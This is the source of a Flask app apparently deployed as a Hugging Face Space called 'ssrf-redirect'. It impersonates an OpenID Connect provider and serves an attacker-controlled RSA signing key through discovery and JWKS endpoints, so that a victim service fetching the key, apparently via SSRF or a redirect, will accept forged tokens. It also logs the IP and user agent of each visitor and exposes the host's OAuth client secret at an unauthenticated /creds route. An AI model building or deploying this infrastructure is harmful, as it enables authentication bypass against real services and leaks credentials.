ssrf-redirect / app.py
pzycl0's picture
Fix port to 5000
d718f29 verified
Raw History Blame Contribute Delete
1.85 kB
from flask import Flask, jsonify, request
import json, os
app = Flask(__name__)
JWKS_JSON = {
"keys": [
{
"kty": "RSA",
"use": "sig",
"kid": "our-controlled-key-v1",
"alg": "RS256",
"n": "kL6nRD9gxpZn9t8rXKLSmUI1aNJ3Sha-1_UW1uQn6kLwqYxUGyFpzNxLuvYM6YIeY7HIBjjdZm_kGrYfKC53hBe0UkO8hLg3855GUFPH39tnTltH110XALYILttxYi5x51klmAnmwk3KN9nwDI99ap_uwPOa486lMb8eZGRkefmmyCOKUxI-VQ4LtZJm6KhHeE7M1TSkUf_YnKZxj9JUl51EyFpLZs7Q-MThSFDYIs6SYKq9d6RwwNQPMOUeD4XN8u08E5U3vWeG_x0c8bGUOZDxEv_cxL-4KKx3VmhlpRoB9jQXWB0tmLfERruZmj_UYjcZBQc7hdNgiE7_ovCobQ",
"e": "AQAB"
}
]
}
SPACE_URL = "https://pzycl0-ssrf-redirect.hf.space"
captured = []
@app.route("/.well-known/openid-configuration")
def oidc_discovery():
return jsonify({
"issuer": SPACE_URL,
"jwks_uri": f"{SPACE_URL}/.well-known/jwks.json",
"authorization_endpoint": f"{SPACE_URL}/authorize",
"token_endpoint": f"{SPACE_URL}/token",
"response_types_supported": ["code", "token"],
"subject_types_supported": ["public"],
"id_token_signing_alg_values_supported": ["RS256"]
})
@app.route("/.well-known/jwks.json")
@app.route("/jwks.json")
def jwks():
captured.append({"path": request.path, "ip": request.remote_addr, "ua": request.headers.get("User-Agent","")})
resp = jsonify(JWKS_JSON)
resp.headers['Access-Control-Allow-Origin'] = '*'
return resp
@app.route("/requests")
def get_reqs():
return jsonify(captured[-50:])
@app.route("/creds")
def creds():
return jsonify({
"OAUTH_CLIENT_ID": os.environ.get("OAUTH_CLIENT_ID"),
"OAUTH_CLIENT_SECRET": os.environ.get("OAUTH_CLIENT_SECRET"),
"SPACE_ID": os.environ.get("SPACE_ID")
})
if __name__ == "__main__":
app.run(host="0.0.0.0", port=5000)